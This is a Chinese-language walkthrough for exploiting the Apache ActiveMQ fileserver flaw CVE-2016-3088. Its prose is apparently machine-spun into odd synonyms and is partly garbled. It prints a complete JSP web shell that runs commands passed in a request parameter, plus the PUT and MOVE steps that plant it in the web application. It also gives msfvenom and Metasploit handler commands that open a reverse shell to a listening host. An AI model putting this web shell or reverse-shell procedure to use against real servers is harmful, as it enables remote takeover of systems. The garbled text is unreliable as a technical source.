标签：

简介：2016年4月14日，国外安适研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安适缝隙，可使长途***者用恶意代码替代Web应用，在受影响系统上执行长途代码（CVE-2016-3088）。 8161端口为web控制大驾口，本缝隙就呈此刻web控制台中。 ActiveMQ的web控制台分三个应用，admin、api和fileserver，此中admin是打点员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才华使用，fileserver无需登录。 fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对此中存储的文件进行读写操纵，，其设计目的是为了弥补动静行列队伍操纵不能传输、存储二进制文件的缺陷，但后来发明：其使用率并不高而且文件操纵容易呈现缝隙。 所以，ActiveMQ在5.12.x~5.13.x版本中，已经默认封锁了fileserver这个应用（你可以conf/jetty.xml中开启之）；在5.14.0版本以后，彻底删除了fileserver应用。

要领1.直接写shell
访谒:8161/fileserver 直接用bp拦截之后把post改成put 在往后面加几行

<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" ACTION=""> <INPUT TYPE="text"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if ( request.getParameter( "comment" ) != null ) { out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" ); Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) ); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream( in ); String disr = dis.readLine(); while ( disr != null ) { out.println( disr ); disr = dis.readLine(); } } %> </pre> </BODY></HTML>

如下图：chen.txt:

返回204代表告成，之后再把put改成move 后面再加一行

Destination:file:///opt/activemq/webapps/api/s.jsp

最后直接访谒 后面加一个api就告成了

要领2.操作 cron 按时任务写 shell
此刻kali里面生成一个***
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.199.109 LPORT=9999 r> bing.jsp
再把他上传到桌面进行打开如下图：

之后和之前一样 在第一行的后面添加一行

Destination:file:///opt/activemq/webapps/api/s.jsp

到网站长进行检察有没有

之后打开kali

use exploit/multi/handler set payload java/jsp_shell_reverse_tcp set lhost 192.168.199.109 set lport 9999 run

进行监听就告成了！

Apache ActiveMQ 长途代码执行缝隙 (CVE-2016-3088)